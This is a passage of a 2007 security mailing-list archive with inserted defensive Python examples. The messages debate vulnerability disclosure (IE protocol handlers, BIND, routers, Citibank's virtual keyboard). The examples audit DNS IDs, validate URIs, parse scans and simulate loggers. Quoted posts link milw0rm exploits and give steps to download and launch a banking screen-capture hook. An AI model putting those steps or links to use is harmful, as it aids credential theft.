Impressive vulnerability, new. Not a 0day.

Not to start an argument again, but fact is, people stop calling 
everything a 0day unless it is, say WMF, ANI, etc. exploited in the wild 
without being known.


I don't like the mis-use of this buzzword.

Gadi.


On Thu, 20 Sep 2007, pdp (architect) wrote:


http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability:
Adobe Acrobat/Reader PDF documents can be used to compromise your
Windows box. Completely!!! Invisibly and unwillingly!!! All it takes
is to open a PDF document or stumble across a page which embeds one.

The issue is quite critical given the fact that PDF documents are in
the core of today's modern business. This and the fact that it may
take a while for Adobe to fix their closed source product, are the
reasons why I am not going to publish any POCs. You have to take my
word for it. The POCs will be released when an update is available.

Adobe's representatives can contact me from the usual place. My advice
for you is not to open any PDF files (locally or remotely). Other PDF
viewers might be vulnerable too. The issue was verified on Windows XP
SP2 with the latest Adobe Reader 8.1, although previous versions and
other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.

cheers

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



Community input/questions for ISOI 3?

2007-08-27 Thread Gadi Evron
Hi, like last time, we are looking for community input and questions for the 
Internet security operations community, to be discussed during ISOI 3.


ISOI is happening this Monday and Tuesday, we will likely compile the responses 
in a few weeks.


We will reply to people personally on issues which bother them, and compile a 
short text with answers to the community itself.


We tried to do this last time around, and encountered a problem with
classifying which material the presenters allow for public consumption, and
which is to remain private due to obvious concerns.


This time around we ask them ahead of time.

The current topics being discussed at ISOI 3 can be located on the schedule:
http://isotf.org/isoi3.html

We may be off though, so feel free to ask on any issue which you find to be
relevant.

Thanks, we appreciate the community's participation.

Gadi.


Re: Exploit In Internet Explorer

2007-08-03 Thread Gadi Evron

On Tue, 31 Jul 2007, Nick FitzGerald wrote:

[EMAIL PROTECTED] wrote:


Discovred By : Hasadya Raed


"Discovred" as in "found in a web page with some dodgy script in it"?
This exploit (though not in this precise form) is common as muck in
them thar int-duh-net tubes at the moment...

You can't mean "discovered" as in "first found through unique personal
research/investigation/etc" as this exploit has been publicly disclosed
since April 2006, I think (and privately used previously?):


I believe RaeD meant no offense and was in fact not aware of the
previous findings. In the past SecuriTeam helped him out with
disclosure and his findings were on the money.


I think:
1. This is either yet another exploit.
2. An honest mistake.

But I am not RaeD, nor affiliated with him. Give people the benefit of the
doubt. Who would steal this bluntly only to be found out?


Thanks.



  http://www.milw0rm.com/exploits/2052

and again, in a more elaborate "multiple dodgy ActiveX control target"
version shortly thereafter:

  http://www.milw0rm.com/exploits/2164


Now You Can To Download Exe Files And To Run Without Msgs :


Oh, and did I mention patched since 11 April 2006:

  http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

So probably not that effective if what you want is an assured "fire an
forget" remote IE exploit...


Regards,

Nick FitzGerald



Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

2007-07-27 Thread Gadi Evron

This is Paul Vixie's response on this, when I asked him for verification:

-
this bug has been reported over and over again for a dozen years.  it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de raadt offered me his random number generator to use.  bind9 should've
used that same one but apparently didn't.  note that with this fix, the
difficulty in poisoning someone's cache rises from "a few tens of seconds"
to "a few minutes".  it's a 16-bit field.  not a lot of room for
randomness or unpredictability.  only DNSSEC, a protocol change, fixes
this problem, which is fundamentally a protocol problem.  but since folks
just won't leave it alone and keep on reporting it year after decade, we
will keep on improving our random number generator for this dinky little
16-bit field.  i just wish the reporters wouldn't be so smarmy and self
congratulatory about it.  it's not like this hasn't been reported, and
fixed, many times by many others.
-

Gadi.
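Vixie's point above is the whole game: a 16-bit transaction ID gives a forger at most 65,536 values to cover, and a generator that merely counts (or steps by a constant) gives them far fewer. The script below is an added example, not BIND code or anything from the quoted message. It shows a resolver operator how to audit a captured run of outgoing query IDs for constant-stride predictability and how to size the residual guessing risk even when the IDs are random. The three ID sequences are constructed in the block, not captured from a real resolver, and the audit threshold is an assumption.

```python
"""Audit a run of DNS transaction IDs for trivial predictability.

Added example, not code from BIND or from the quoted message. The ID
sequences below are constructed, not captured from a real resolver.
"""
import random

ID_SPACE = 1 << 16  # the DNS transaction ID is a 16-bit field

# Constructed samples of 64 consecutive outgoing-query IDs, as an operator
# could record them from a packet capture on the resolver.
SEQUENTIAL_IDS = [(0x1000 + i) % ID_SPACE for i in range(64)]        # plain counter
STEPPED_IDS = [(12345 + 40503 * i) % ID_SPACE for i in range(64)]    # constant stride
RANDOM_IDS = random.Random(2007).sample(range(ID_SPACE), 64)         # stands in for a CSPRNG


def guess_probability(forged_replies: int, id_bits: int = 16) -> float:
    """Chance that a batch of forged replies, each carrying a distinct guessed
    ID, matches one outstanding query whose ID is uniformly random.
    With 16 bits that is forged_replies / 65536, capped at certainty."""
    return min(1.0, forged_replies / float(1 << id_bits))


def predictable_fraction(ids) -> float:
    """Fraction of IDs an observer could have predicted from the two previous
    ones by assuming a constant stride. Counters and additive generators score
    1.0 here although their output can look well spread; a good generator
    scores close to 0."""
    if len(ids) < 3:
        return 0.0
    hits = 0
    for prev2, prev1, actual in zip(ids, ids[1:], ids[2:]):
        predicted = (prev1 + (prev1 - prev2)) % ID_SPACE
        if predicted == actual:
            hits += 1
    return hits / (len(ids) - 2)


def audit(ids, threshold: float = 0.1) -> dict:
    """Summarise one captured run. `threshold` is an assumed cut-off: a run
    where at least 10% of IDs follow a constant stride is flagged."""
    frac = predictable_fraction(ids)
    verdict = "predictable" if frac >= threshold else "no constant stride found"
    return {"samples": len(ids), "distinct": len(set(ids)),
            "stride_predictable": round(frac, 3), "verdict": verdict}


if __name__ == "__main__":
    for name, seq in (("counter", SEQUENTIAL_IDS), ("stepped", STEPPED_IDS),
                      ("random", RANDOM_IDS)):
        print(f"{name:8s} {audit(seq)}")
    # Even with perfectly random IDs the field is small: a batch of 1000
    # forged replies has about a 1.5% chance per query, which is Vixie's point.
    print("P(hit) for 1000 forged replies:", round(guess_probability(1000), 4))
```

The stride test only catches the simplest weak generators; it is a smoke test for "did someone forget to randomise", not a proof of randomness. The `guess_probability` figure is the part no generator change can improve, which is why the quoted message points at DNSSEC as the real fix.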


Re: Internet Explorer 0day exploit

2007-07-17 Thread Gadi Evron

On Sat, 14 Jul 2007, Dragos Ruiu wrote:

On Tuesday 10 July 2007 08:53, Gadi Evron wrote:

To paraphrase Guninski, this is still not a 0day. It is a vulnerability
being disclosed.


You're being pedantic Gadi. :-)

We have to accept the term "0day" has passed into
the realm of meaningless nebulousness along with
"hacker" and other misused terms.

If we are to be pedantic, the original meaning of
0day is new warez release :-).


I think there is still hope for us buddy, at least when professionals make 
releases.
For example, instead of saying I'm being pedantic on this (which I am), 
you could (also, in addition) reply and say "yep" or "nope", thus 
contributing to some discussion. Meaning, we would either make a stand for 
our profession or at the very least get educated as we go along.


Some people believe the way to reach a "mature industry" is time, others 
believe it's training or in a more specific fashion, certifications. I 
don't know what the answer is, and I am sure it isn't terminology (or 
certifications, hehe).


I do know though, what a 0day is, and don't intend to compromise it for 
the sake of what the press makes of it. It's a strong term and concept 
which shouldn't be abused. That or we can decide on a new term for what 
0day used to mean. How about "blubla"?


From professionals, we can expect good language and for their work to 
speak for them. We shouldn't compromise on silly things like what 0day 
means.


Maybe I will give this up next year, but for now, advisories named "0day"
have disappeared lately. Maybe peer pressure does have some effect.


The above is over-thinking and some could consider it very silly, but for 
now, I believe in it. It's just like I resent those among consultants who 
conduct themselves in a fashion that makes me ashamed of my profession, as 
a far-off analogy.



cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan   November 29/30 - 2007   http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp



Re: Internet Explorer 0day exploit

2007-07-13 Thread Gadi Evron

On Tue, 10 Jul 2007, Thor Larholm wrote:

There is a URL protocol handler command injection vulnerability in Internet


Thor, thank you for sharing. Nice work.

To paraphrase Guninski, this is still not a 0day. It is a vulnerability 
being disclosed.



Explorer for Windows that allows you to execute shell commands with arbitrary 
arguments. This vulnerability can be triggered without user interaction 
simply by visiting a webpage.


When Internet Explorer encounters a reference to content inside a registered 
URL protocol handler scheme it calls ShellExecute with the EXE image path and 
passes the entire request URI without any input validation. For the sake of 
demonstration I have constructed an exploit that bounces through Firefox via 
the FirefoxURL protocol handler. The full advisory and a working Proof of 
Concept exploit can be found at


http://larholm.com/2007/07/10/internet-explorer-0day-exploit/

Cheers
Thor Larholm
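The fix the advisory implies is the missing validation step: treat anything that will be handed to an external program as untrusted and check it before the call, not after. The block below is an added example (not Internet Explorer, Firefox or Thor Larholm's code) of such a pre-dispatch check. `dispatch` stands in for the call that launches a registered handler; the scheme allowlist, character set and length cap are assumptions for this example, and the sample URIs are constructed.

```python
"""Strict validation of a URI before it is handed to a registered protocol
handler. Added example, not Internet Explorer, Firefox or Thor Larholm's code.
`dispatch` stands in for the OS call that starts the handler; the allowed
schemes, character set and length cap are assumptions for this example."""
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"firefoxurl", "mailto"}   # assumed per-host allowlist
MAX_URI_LEN = 2048                            # assumed cap

# Conservative subset of RFC 3986 characters: no quotes, whitespace, control
# characters, backslashes or angle brackets, so nothing in the string can be
# reinterpreted once it reaches a command line.
_SAFE_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#@!$&()*+,;=%]*$")
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


class RejectedURI(ValueError):
    """Raised when a URI must not reach a handler."""


def validate_handler_uri(uri: str) -> str:
    """Return `uri` unchanged if it is safe to pass on, else raise RejectedURI."""
    if len(uri) > MAX_URI_LEN:
        raise RejectedURI("URI too long")
    if not _SAFE_CHARS.match(uri):
        raise RejectedURI("URI contains a disallowed character")
    scheme = urlsplit(uri).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise RejectedURI(f"scheme not allowed: {scheme!r}")
    # A handler may percent-decode before use, so encoded quotes, whitespace
    # and control characters are treated like the literal ones.
    for m in _PCT.finditer(uri):
        code = int(m.group(1), 16)
        if code < 0x20 or code == 0x7F or chr(code) in "\"' \\<>":
            raise RejectedURI("URI contains an encoded control or quote character")
    return uri


def is_rejected(uri: str) -> bool:
    """Convenience check: True if validate_handler_uri would refuse `uri`."""
    try:
        validate_handler_uri(uri)
    except RejectedURI:
        return True
    return False


def dispatch(uri: str, launch) -> bool:
    """Validate, then call `launch(scheme, uri)`, the stand-in for starting the
    registered handler. Returns True if the handler was launched."""
    try:
        clean = validate_handler_uri(uri)
    except RejectedURI:
        return False
    launch(urlsplit(clean).scheme.lower(), clean)
    return True


if __name__ == "__main__":
    # Constructed sample URIs; none of these are real links.
    launched = []
    for sample in ("firefoxurl:profile", "mailto:user@example.com",
                   'firefoxurl:"quoted"', "firefoxurl:%22encoded",
                   "ftp://example.com/"):
        ok = dispatch(sample, lambda scheme, u: launched.append((scheme, u)))
        print("launched" if ok else "rejected", sample)
```

The check is deliberately an allowlist: a blocklist of "bad" characters would have to be updated every time a handler's command-line parser turned out to treat another character specially, while an allowlist only ever needs to grow when a legitimate URI is refused.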



CFP: ISOI III (a DA workshop)

2007-06-26 Thread Gadi Evron

CFP: ISOI III (a DA workshop)
=============================


Introduction


CFP information and current speakers below.

ISOI 3 (Internet Security Operations and Intelligence) will be held in
Washington DC this August the 27th, 28th.

This time around the folks at US-CERT (Department of Homeland Security -
DHS) are hosting. Sunbelt Software is running the after-party dinner.

We only have a partial agenda at this time (see below), but to remind
you of what you will see, here are the previous ones:
http://isotf.org/isoi2.html
http://isotf.org/isoi.html

If you haven't RSVP'd yet, please do so soon. Although we have 240
seats, we are running out of space.

A web page for ISOI 3 can be found at: http://isotf.org/isoi3.html


Details
---
27th, 28th August, 2007
Washington DC -
AED conference center:
http://www.aedconferencecenter.org/main/html/main.html

Registration via [EMAIL PROTECTED] is mandatory, no cost attached to
attending. Check if you apply for a seat in our web page.


CFP
---

This is the official CFP for ISOI 3. Main subjects include: fastflux,
fraud, DDoS, botnets. Other subjects relating to Internet security
operations are also welcome.

Some of our current speakers as you can see below lecture on anything
from Estonia's "war" to current web 2.0 threats in-the-wild.

Please email [EMAIL PROTECTED] as soon as possible to submit a proposal.
I will gather them and give them to our committee (Jeff Moss) for
review.


Current speakers (before committee decision)


Roger Thompson (Exp Labs)
- Google adwords .. .the dangers of dealing with the Russian mafia

Barry Raveendran Greene (Cisco)
- What you should be asking me as a routing vendor

John LaCour (Mark Monitor)
- Vulnerabilities used to hack sites for phishing
- Using XSS to track phishers

Dan Hubbard (Websense)
- Mpack and Honeyjax (Web 2.0 honeypots)

April Lorenzen
- Fastflux: Operational Update

William Salusky (AOL)
- The Spammer Evolves - Migration to WebMail

Hillar Aarelaid (Estonian CERT)
- Incident Response during the Recent Attack

Gadi Evron (Beyond Security)
- Strategic Lessons from the Estonian "First Internet War"

Jose Nazario (Arbor)
- Botnet statistics from the Estonian attack

Andrew Fried (Treasury Department)
- Phishing and the IRS - New Methods

Danny McPherson (Arbor)
- TBA



Re: Broadband routers and botnets - being proactive

2007-05-15 Thread Gadi Evron
Fergie replied on NANOG to my recent post on the subject of broadband
routers insecurity:

> I'll even go a step further, and say that if ISPs keep punting
> on the whole botnet issue, and continue to think of themselves
> as 'common carriers' in some sense -- and continue to disengage
> on the issue -- then you may eventually forced to address those
> issues at some point in the not-so-distant future.
>
> I understand the financial disincentives, etc., but if the problem
> continues to grow and fester, and consumer (and financial institutions)
> losses grow larger, things may take a really ugly turn.

He is right, but I have a comment I felt it was important - to me - to
make. Not just on this particular vulnerability, but on the "war".

I must admit, vulnerabilities are endless and new exploitation vectors
will never end, even if it was possible and we were all 100% secure,
someone (an attacker rather than a vulnerability) will find a way to make
it 99% again for the right investment or with the right moment of
brilliance.

Enough with cheap philosophy though... as tired (even exhausted) as I am
of the endless repeating circle which security is, on all levels (from the
people involved through the interests involved all the way to the
same-old-FUD) I still haven't burned out, and I am still here.

The world isn't going to end tomorrow, and even if the Internet was to die
(which I doubt it will), we will survive. However, in the recent couple of
years a new community has been forming which we started referring to as
"Internet security operations". These folks, for various motives, work to
make the Internet stay up and become safer (actually being safe is a long
lost battle we should have never fought the way things were built).

With such a community being around, treating issues beyond our little
corner of the `net is possible to a level, and at least some progress is
made. Some anti virus engineers no longer care only about samples, some
network engineers no longer care only about their networks, etc.

Is any of this a solution? No. The problems themselves will not go away,
they aren't in any significant fashion currently being dealt with beyond
the tactical level of a fire brigade.

Is it the end then? Of course not. But operations vs. research are
determined by intelligence. As we have some intelligence, I can point to
yet another annoying vulnerability in the endless circle which those of us
who will want to, can study, and if they feel it is justified, defend
against. That is the broadband routers issue, which personally I'd really
rather avoid.

Unfortunately, this limited defense is what most of us can do at our own
homes, or tops as a volunteer fire brigade or neighborhood watch.

The Internet is the most disconnected global village I can imagine, but
we all have the funny uncle on another network and a weird one on yet
another. I sometimes feel that the old analogy of the Internet to the Wild
West is not quite it. Perhaps we are living in the Wild West, only if
instead of wastelands and small towns, we have New York city and the laws
of a feudal dark ages Kingdom.

Things will eventually change, and some of us will stick around to help
that change (or try to). For now though, it is about one vulnerability
ignored at a time, and working on our communities.

Gadi Evron.



Broadband routers and botnets - being proactive

2007-05-12 Thread Gadi Evron
In this post I'd like to discuss the threat widely circulated insecure
broadband routers pose today. We have touched on it before.

Today, yet another public report of a vulnerable DSL modem type was posted
to bugtraq, this time about a potential WIRELESS flaw with broadband
routers being insecure at Deutsche Telekom. I haven't verified this one
myself but it refers to "Deutsche Telekom Speedport w700v broadband
router":
http://seclists.org/bugtraq/2007/May/0178.html

If you all remember, there was another report a few months ago about a UK
ISP named BeThere with their wireless router being accessible from the
Internet and exploitable, as another example:
http://blogs.securiteam.com/index.php/archives/826

Two issues here:
1. Illegitimate access to broadband routers via wireless communication.
2. Illegitimate access to broadband routers via the WAN.

I'd like to discuss #2.

Some ISPs which provide such devices (as in the example of #2 above) use
them as bridges only, preventing several attack vectors (although not
all). Many others don't. Most broadband ISPs have a vulnerable user-base
on some level.

Many broadband ISPs around the world distribute such devices to their
clients.

Although the general risk is well known, like with many other security
issues many of us remained mostly quiet in the hope of avoiding massive
exploitation. As usual, we only delayed the inevitable. I fear that the
lack of awareness among some ISPs for this "not yet widely exploited
threat" has resulted in us not being PROACTIVE and taking action to secure
the Internet in this regard. What else is new, we are all busy with
yesterday's fires to worry about tomorrow's.
Good people will REACT and solve the problem when it pops up in
wide-exploitation, but what we may potentially be facing is yet another
vector for massive infections and the creation of eventual bot armies on
yet another platform.

My opinion is, that with all these public disclosures and a ripe pool of
potential victims, us delaying massive exploitation of this threat may not
last. I believe there is currently a window of opportunity for service
providers to act and secure their user-base without rushing. Nothing in
security is ever perfect, but actions such as changing default passwords
and preventing connections from the WAN to these devices would be a good
step to consider if you haven't already.

My suggestion would be to take a look at your infrastructure and what your
users use, and if you haven't already, add some security there. You
probably have a remote login option for your tech support staff which you
may want to explore - and secure. That's if things were not left at their
defaults.

Then, I'd also suggest scanning your network for what types of broadband
routers your users make use of, and how many of your clients have port 23
or 80 open. Whether you provide with the devices or not, many will be
using different ones set to default which may pose a similar threat. Being
aware of the current map of vulnerable devices of this type in your
networks can't hurt.

It is not often that we can predict which of the numerous threats out
there that we do not address currently, is going to become exploited
next. If you can spare the effort, I'd strongly urge you to explore this
front and be proactive on your own networks.

The previous unaddressed threat which most of us chose to ignore was
spoofing. We all knew of it for a very long time, but some of us believed
it did not pose a threat to the Internet or their networks for no other
reason than "it is not currently being exploited" and "there are enough
bots out there for spoofing to not be necessary". I still remember the
bitter argument I had with Randy Bush over that one. This is a rare
opportunity, let's not waste it.

We are all busy, but I hope some of you will have the time to look into
this.

I am aware of and have assisted several ISPs, who spent some time and
effort exploring this threat and in some cases acting on it. If anyone can
share their experience on dealing with securing their infrastructure in
this regard publicly, it would be much appreciated.

Thanks.

Gadi Evron.
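For the scan Gadi suggests, the question an ISP wants answered is how many customer-premises devices accept telnet or HTTP from the WAN side, before anyone contacts customers or changes a default. The script below is an added example, not the post's code: it parses nmap's grepable (`-oG`) output for ports 23 and 80 and summarises exposure. The scan lines are constructed and use TEST-NET addresses (203.0.113.0/24), so there is no real scan data here; the watched ports are the two the post names.

```python
"""Summarise an nmap grepable (-oG) scan of a customer range for CPE devices
answering on telnet (23) or HTTP (80) from the WAN side. Added example, not
code from the post. SAMPLE_SCAN is constructed (TEST-NET addresses), not a
real scan."""
import re
from collections import Counter

WATCHED_PORTS = {23: "telnet", 80: "http"}   # the two services the post names

# Constructed -oG output; the tab-separated field layout follows nmap's
# grepable format (Host: ip (name)<TAB>Ports: port/state/proto//service///, ...).
SAMPLE_SCAN = """\
# Nmap scan (constructed sample) as: nmap -p23,80 -oG - 203.0.113.0/28
Host: 203.0.113.1 ()\tStatus: Up
Host: 203.0.113.1 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///\tIgnored State: closed (0)
Host: 203.0.113.2 ()\tPorts: 23/closed/tcp//telnet///, 80/open/tcp//http///
Host: 203.0.113.3 ()\tPorts: 23/filtered/tcp//telnet///, 80/filtered/tcp//http///
Host: 203.0.113.4 (cpe-4.example.net)\tPorts: 23/open/tcp//telnet///, 80/closed/tcp//http///
Host: 203.0.113.5 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///
# Nmap done -- 16 IP addresses (5 hosts up) scanned
"""

_HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")


def parse_grepable(text):
    """Yield (ip, hostname, {port: state}) for each 'Ports:' line."""
    for line in text.splitlines():
        m = _HOST_LINE.match(line)
        if not m:
            continue                       # comments and non-host lines
        ip, name, rest = m.groups()
        fields = dict(f.split(": ", 1) for f in rest.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue                       # e.g. a 'Status: Up' line
        states = {}
        for entry in fields["Ports"].split(","):
            port, state = entry.strip().split("/")[:2]
            states[int(port)] = state
        yield ip, name, states


def exposure_report(text):
    """Count hosts with each watched port open and list the exposed hosts, so
    an ISP can size the problem before contacting customers."""
    open_counts = Counter()
    exposed = []
    hosts = 0
    for ip, name, states in parse_grepable(text):
        hosts += 1
        open_here = sorted(p for p in WATCHED_PORTS if states.get(p) == "open")
        for p in open_here:
            open_counts[WATCHED_PORTS[p]] += 1
        if open_here:
            exposed.append((ip, name or "-", open_here))
    return {"hosts_with_port_data": hosts,
            "open_counts": dict(open_counts),
            "exposed": exposed}


if __name__ == "__main__":
    report = exposure_report(SAMPLE_SCAN)
    print(f"{report['hosts_with_port_data']} hosts with port data; "
          f"open from WAN: {report['open_counts']}")
    for ip, name, ports in report["exposed"]:
        print(f"  {ip:15s} {name:20s} ports {ports}")
```

On a real range the input would come from something like `nmap -p23,80 -oG scan.gnmap <your customer range>` run from outside the customer side, followed by `exposure_report(open("scan.gnmap").read())`; "filtered" results are the devices (or the ISP's own ACLs) already doing what the post recommends.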



RE: Defeating Citibank Virtual Keyboard protection using screenshot method

2007-05-10 Thread Gadi Evron
On Wed, 9 May 2007, Jim Harrison wrote:
> Without getting into SMTP latency comparisons...
> 
> Perhaps I missed something, but where is the threat demonstrated sans
> code installation?
> I'm not trying to disparage anyone's work, but as you yourself pointed
> out, there is nothing demonstrated here that doesn't qualify as common
> malware.

We are all really in agreement.

> 
> -----Original Message-----
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Wednesday, May 09, 2007 1:42 PM
> To: Jim Harrison
> Cc: Int3; bugtraq@securityfocus.com
> Subject: RE: Defeating Citibank Virtual Keyboard protection using
> screenshot method
> 
> On Wed, 9 May 2007, Jim Harrison wrote:
> > Granted, it's an interesting methodology, but until you can
> demonstrate
> > circumvention of the CitiBank keylogger without installing code on the
> > victim host, a threat is not indicated and cannot be taken seriously.
> 
> Even though I was the first to point out this is old news for the
> malware
> scene in online/e fraud, I'd be the first to bow down before Int3 and
> say
> "thank you for sharing your work with us". Many don't.
> 
> But your point above:
> "without installing malware on the victim host"
> 
> Although true on some level, is bogus for the purpose of this work, as
> it
> being written makes an automatic assumption on working only after malware
> is installed.
> 
> Although you are right, in practice this is already an heavily abused
> technology, and.. 
> 'Getting malware on a system', who ever heard of such a ridiculous
> idea? :)
> 
>   Gadi.
> 
> > 
> > -----Original Message-----
> > From: Int3 [mailto:[EMAIL PROTECTED] 
> > Sent: Wednesday, May 09, 2007 11:14 AM
> > To: Jim Harrison
> > Cc: bugtraq@securityfocus.com
> > Subject: Re: Defeating Citibank Virtual Keyboard protection using
> > screenshot method
> > 
> >  
> > This is not malware, it will only help people to experiment and see the
> > result without writing one for themselves.
> >  
> > Regards,
> > Yash K.S
> >  
> > On 5/9/07, Jim Harrison <[EMAIL PROTECTED]> wrote: 
> > 
> > (copied here without permission)
> > Step by Step Demo:
> > 
> > - Download POC from http://tracingbug.com/downloads/citihook.zip
> > <http://tracingbug.com/downloads/citihook.zip>  and
> > unzip to some directory
> > - Launch citihook.exe, this will watch only
> > https://www.online.citibank.co.in/ URL
> > 
> > Effectively, "Let me install my malware on your machine to
> > demonstrate
> > how vulnerable it is."
> > 
> > P-p-p-p-p-p-leeeze (three anti-social points for that quote)!
> > The "problem" ceases to be a vulnerability at this point. 
> > 
> > -Original Message-
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> > Sent: Monday, May 07, 2007 3:03 AM
> > To: bugtraq@securityfocus.com <mailto:bugtraq@securityfocus.com>
> > 
> > Subject: Defeating Citibank Virtual Keyboard protection using
> > screenshot
> > method
> > 
> > Severity: Critical
> > 
> > Platforms Affected:
> > 
> > Microsoft Corporation: Windows 98 Any version 
> > Microsoft Corporation: Windows Me Any version
> > Microsoft Corporation: Windows XP Any version
> > Microsoft Corporation: Windows 2000 Any version
> > Microsoft Corporation: Windows 2003 Any version
> > Microsoft Corporation: Windows NT 4.0 Any version
> > Citi-Bank: Citi-Bank Virtual Keyboard Any version
> > 
> > Browsers:
> > Microsoft Internet Explorer Any version
> > Mozilla FireFox Any version
> > Any browser runs on Win32 platform ( With slight modification ) 
> > 
> > Original URL :
> > http://www.tracingbug.com/index.php/articles/view/23.html
> > 
> > Regards,
> > Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
> > 
> > All mail to and from this domain is GFI-scanned.
> > 
> > 
> > 
> > 
> > 
> > 
> 
> 
> 



RE: Defeating Citibank Virtual Keyboard protection using screenshot method

2007-05-09 Thread Gadi Evron
On Wed, 9 May 2007, Jim Harrison wrote:
> Granted, it's an interesting methodology, but until you can demonstrate
> circumvention of the CitiBank keylogger without installing code on the
> victim host, a threat is not indicated and cannot be taken seriously.

Even though I was the first to point out this is old news for the malware
scene in online/e fraud, I'd be the first to bow down before Int3 and say
"thank you for sharing your work with us". Many don't.

But your point above:
"without installing malware on the victim host"

Although true on some level, is bogus for the purpose of this work, as it
being written makes an automatic assumption on working only after malware
is installed.

Although you are right, in practice this is already an heavily abused
technology, and.. 
'Getting malware on a system', who ever heard of such a ridiculous
idea? :)

Gadi.

> 
> -----Original Message-----
> From: Int3 [mailto:[EMAIL PROTECTED] 
> Sent: Wednesday, May 09, 2007 11:14 AM
> To: Jim Harrison
> Cc: bugtraq@securityfocus.com
> Subject: Re: Defeating Citibank Virtual Keyboard protection using
> screenshot method
> 
>  
> This is not malware, it will only help people to experiment and see the
> result without writing one for themselves.
>  
> Regards,
> Yash K.S
>  
> On 5/9/07, Jim Harrison <[EMAIL PROTECTED]> wrote: 
> 
>   (copied here without permission)
>   Step by Step Demo:
>   
>   - Download POC from http://tracingbug.com/downloads/citihook.zip
>   and
>   unzip to some directory
>   - Launch citihook.exe, this will watch only
>   https://www.online.citibank.co.in/ URL
>   
>   Effectively, "Let me install my malware on your machine to
> demonstrate
>   how vulnerable it is."
>   
>   P-p-p-p-p-p-leeeze (three anti-social points for that quote)!
>   The "problem" ceases to be a vulnerability at this point. 
>   
>   -----Original Message-----
>   From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
>   Sent: Monday, May 07, 2007 3:03 AM
>   To: bugtraq@securityfocus.com 
> 
>   Subject: Defeating Citibank Virtual Keyboard protection using
> screenshot
>   method
>   
>   Severity: Critical
>   
>   Platforms Affected:
>   
>   Microsoft Corporation: Windows 98 Any version 
>   Microsoft Corporation: Windows Me Any version
>   Microsoft Corporation: Windows XP Any version
>   Microsoft Corporation: Windows 2000 Any version
>   Microsoft Corporation: Windows 2003 Any version
>   Microsoft Corporation: Windows NT 4.0 Any version
>   Citi-Bank: Citi-Bank Virtual Keyboard Any version
>   
>   Browsers:
>   Microsoft Internet Explorer Any version
>   Mozilla FireFox Any version
>   Any browser that runs on the Win32 platform ( With slight modification ) 
>   
>   Original URL :
> http://www.tracingbug.com/index.php/articles/view/23.html
>   
>   Regards,
>   Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
>   
>   All mail to and from this domain is GFI-scanned.
>   
>   
> 
> 
> 
> All mail to and from this domain is GFI-scanned.
> 



Re: Defeating Citibank Virtual Keyboard protection using screenshot method

2007-05-09 Thread Gadi Evron
On 7 May 2007 [EMAIL PROTECTED] wrote:
> Severity: Critical 

Erm, you do realize malware has been doing this for a long long time now,
right?

Virtual keyboards come as a solution for fighting one type of phishing and
one type alone. OCR or screenshots of mouse position on-click, for
example, are happening daily.

In most cases, it isn't really required to take screenshots:
http://blogs.securiteam.com/index.php/archives/678

Gadi.


> 
> Platforms Affected:
> 
> Microsoft Corporation: Windows 98 Any version 
> Microsoft Corporation: Windows Me Any version 
> Microsoft Corporation: Windows XP Any version
> Microsoft Corporation: Windows 2000 Any version 
> Microsoft Corporation: Windows 2003 Any version 
> Microsoft Corporation: Windows NT 4.0 Any version
> Citi-Bank: Citi-Bank Virtual Keyboard Any version 
> 
> Browsers:
> Microsoft Internet Explorer Any version
> Mozilla FireFox Any version
> Any browser that runs on the Win32 platform ( With slight modification )
> 
> Original URL : http://www.tracingbug.com/index.php/articles/view/23.html
> 
> Regards,
> Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
> 

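Gadi's point above, that a virtual keyboard defeats exactly one collection technique, is easy to see in a small threat model. The following is an added simulation, not code from the original post or from the tracingbug proof of concept: three observer types (keyboard hook, mouse-coordinate logger, screenshot-on-click) are run against a ten-digit on-screen keypad, once with a fixed layout and once with a randomized layout. The randomization scheme and the keypad geometry are assumptions made for the model.

```python
import random

DIGITS = "0123456789"
FIXED_LAYOUT = {slot: d for slot, d in enumerate(DIGITS)}   # slot i shows digit i

def randomized_layout(rng):
    """Shuffle which digit each of the ten on-screen slots shows, re-drawing
    until no digit sits in its fixed slot, so a coordinate-only guess based
    on the fixed layout is wrong for every digit (assumed bank behaviour)."""
    digits = list(DIGITS)
    while True:
        rng.shuffle(digits)
        if all(d != DIGITS[i] for i, d in enumerate(digits)):
            return dict(enumerate(digits))

def enter_pin(pin, layout):
    """The victim clicks the slot showing each PIN digit. Every click yields
    (slot, layout_at_click): the coordinate any mouse hook records, plus what
    a screenshot taken at that instant shows."""
    inverse = {d: slot for slot, d in layout.items()}
    return [(inverse[d], dict(layout)) for d in pin]

def keystroke_logger(clicks):
    """Hooks the keyboard only. A virtual keyboard generates no key events,
    which is the single threat it removes."""
    return ""

def click_logger(clicks, assumed_layout=FIXED_LAYOUT):
    """Records mouse coordinates only and maps them through a layout it
    assumes; beaten by layout randomization."""
    return "".join(assumed_layout[slot] for slot, _ in clicks)

def screenshot_on_click(clicks):
    """Grabs the screen at each click and reads the digit under the cursor;
    layout randomization changes nothing for it."""
    return "".join(layout_at_click[slot] for slot, layout_at_click in clicks)

def which_loggers_recover(pin, randomized, seed=7):
    """Return, per observer, whether it recovered the PIN."""
    layout = randomized_layout(random.Random(seed)) if randomized else FIXED_LAYOUT
    clicks = enter_pin(pin, layout)
    return {
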